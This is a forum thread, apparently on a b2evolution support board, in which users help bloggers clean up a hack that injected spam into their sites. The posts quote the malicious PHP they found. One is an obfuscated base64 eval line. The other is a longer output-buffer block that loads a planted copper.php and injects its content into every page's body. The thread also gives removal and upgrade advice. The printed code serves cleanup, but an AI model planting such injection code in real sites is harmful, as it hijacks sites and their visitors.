You may want to upgrade to the latest b2evolution version. Also consider changing your passwords.
Well, I've no experience with b2evo v1.9.x, so I can't really help you, sorry.

Here's the code you should delete from skins/custom/_main.php

<? /**/eval(base64_decode('aWYoZTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

p.s.
It's a lot longer than in my example. And try to find the file named copper.php, use search in files/directories. Rename it or delete (do it on your own risk) when you find this file.

What version of coppermine gallery are you running?

¥

¥åßßå, it has nothing to do with coppermine gallery, it's just a file generating spam.

You may want to read this.
http://www.tinyportal.net/index.php?action=printpage;topic=26106.0
http://www.xoops.org/modules/newbb/viewtopic.php?post_id=297046

BTW, here's the full code I found in nelsonguirado's index.main.php

if( function_exists('ob_start') && !isset($GLOBALS['sh_no']) )
{
	$GLOBALS['sh_no'] = 1;
	if( file_exists('/LONG_PATH/copper.php') )
	{
		include_once('/LONG_PATH/copper.php');
		if( function_exists('gml') && !function_exists('dgobh') )
		{
			if( !function_exists('gzdecode') )
			{
				function gzdecode( $R20FD65E9C7406034FADC682F06732868 )
				{
					$R6B6E98CDE8B33087A33E4D3A497BD86B = ord( substr($R20FD65E9C7406034FADC682F06732868,3,1) );
					$R60169CD1C47B7A7A85AB44F884635E41 = 10;
					$R0D54236DA20594EC13FC81B209733931 = 0;
					
					if( $R6B6E98CDE8B33087A33E4D3A497BD86B & 4 )
					{
						$R0D54236DA20594EC13FC81B209733931 = unpack( 'v', substr($R20FD65E9C7406034FADC682F06732868,10,2) );
						$R0D54236DA20594EC13FC81B209733931 = $R0D54236DA20594EC13FC81B209733931[1];
						$R60169CD1C47B7A7A85AB44F884635E41 + = 2 + $R0D54236DA20594EC13FC81B209733931;
					}
					
					if( $R6B6E98CDE8B33087A33E4D3A497BD86B & 8 )
					{
						$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
					}
					
					if( $R6B6E98CDE8B33087A33E4D3A497BD86B & 16 )
					{
						$R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
					}
					
					if($R6B6E98CDE8B33087A33E4D3A497BD86B&2)
					{
						$R60169CD1C47B7A7A85AB44F884635E41+=2;
					}
					$RC4A5B5E310ED4C323E04D72AFAE39F53 = gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
					
					if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE)
					{
						$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;
					}
					return $RC4A5B5E310ED4C323E04D72AFAE39F53;
				}
			}
	
		function dgobh($RDA3E61414E50AEE968132F03D265E0CF)
		{
			Header('Content-Encoding: none');
			
			$R3E33E017CD76B9B7E6C7364FB91E2E90 = gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
			
			if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90))
			{
				return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
			}
			else
			{
				return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
			}
		}
		ob_start('dgobh');}
	}
}

That's cool, but for the file to be edited the attacker needed a door ;)

They're both running different evo versions and they're both running coppermine, just not sure of the versions.

¥

That's the reason why privatjokr should change his passwords (and check other files/scripts for vulnerabilities).

This virus is known to enter through upload in FCKEditor (v2.3). The solution is upgrade that to 2.6.

Yabba may be on to something. Another site,I have, www.magnasquids.com, had Coppermine and it s SMF forum was hacked with the same copper thing.

My hacked blog, on another server, had a Coppermine installation in the same directory.

Yabba may be on to something. Another site,I have, www.magnasquids.com, had Coppermine and it s SMF forum was hacked with the same copper thing.

My hacked blog, on another server, had a Coppermine installation in the same directory.

By the way, I love blogging again, thanks to you guys. I hope you guys stick around for a long time.

Thanks for the reply! Interesting... Perhaps I will revisit after some sleep then... ;)